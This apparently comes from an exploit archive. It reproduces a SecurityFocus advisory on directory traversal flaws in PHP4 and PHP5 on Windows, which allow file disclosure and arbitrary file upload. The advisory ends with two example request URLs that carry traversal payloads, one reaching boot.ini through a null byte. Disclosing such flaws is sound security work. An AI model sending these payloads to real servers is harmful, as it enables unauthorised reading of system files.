9 lines
No EOL
553 B
Text
9 lines
No EOL
553 B
Text
source: http://www.securityfocus.com/bid/11981/info
|
|
|
|
PHP4 and PHP5 are reported prone to multiple remotely exploitable vulnerabilities. These issue result from insufficient sanitization of user-supplied data. A remote attacker may carry out directory traversal attacks to disclose arbitrary files and upload files to arbitrary locations.
|
|
|
|
It is reported that these vulnerabilities may only be exploited on Windows.
|
|
|
|
|
|
http://www.example.com/phpscript.php?whatever=../../../../boot.ini%00
|
|
http://www.example.com/phpscript.php?whatever=..\'file.ext |